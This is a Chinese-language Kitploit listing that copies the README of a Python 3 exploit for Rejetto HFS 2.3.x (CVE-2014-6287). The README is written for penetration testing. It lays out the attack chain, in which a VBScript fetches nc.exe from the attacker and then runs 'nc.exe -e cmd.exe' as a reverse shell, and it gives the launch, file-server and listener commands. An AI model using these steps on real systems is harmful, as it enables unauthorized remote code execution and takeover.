Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — 针对 Rejetto HTTP File Server 2.3.x(CVE-2014-6287)的远程命令执行漏洞利用工具,使用 Python 3 重写,适用于现代攻击性安全测试。 | Kitploit
工具/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

针对 Rejetto HTTP File Server 2.3.x(CVE-2014-6287)的远程命令执行漏洞利用工具,使用 Python 3 重写,适用于现代攻击性安全测试。

查看仓库
29个月前尚未审核

HFS 远程命令执行漏洞利用(CVE-2014-6287)

这是经典远程命令执行(RCE)漏洞利用程序的 Python 3 重写版本,目标为 Rejetto HTTP 文件服务器(HFS)v2.3.x,利用了编号为 CVE-2014-6287 的漏洞。

该漏洞最初由 Avinash Kumar Thapa(又名“-Acid”) 发现,此版本提高了可移植性和易用性,提供了完全参数化和现代兼容性。


⚠️ 免责声明

本工具仅用于教育和授权渗透测试目的。未经授权对并非你拥有或未获明确许可的系统进行使用,是非法且不道德的。


📌 漏洞利用详情

  • 漏洞: Rejetto HFS v2.3.x - 远程命令执行
  • CVE: CVE-2014-6287
  • 影响: 以系统权限远程执行代码
  • 要求: 目标必须运行启用了脚本功能的易受攻击版本的 HFS。

🚀 功能特性

  • 完全兼容 Python 3
  • 通过 CLI 接受所有关键参数:
    • 目标 IP 和端口
    • 本地 IP(攻击者)
    • 反向 shell 的监听端口
    • 用于托管 nc.exe 的端口
  • 无硬编码值
  • 使用 VBScript 进行经典 nc.exe 反向 shell 投递
  • 利用流程:
    1. 上传一个 VBScript 以下载 nc.exe
    2. 在目标上执行 VBScript
    3. 运行 nc.exe -e cmd.exe 以建立反向 shell

🛠️ 使用方法

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

示例:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

要求:
  - 提供 nc.exe 的 HTTP 服务器:
      python3 -m http.server 8000
  - 监听器:
      nc -lvnp 4444
下载工具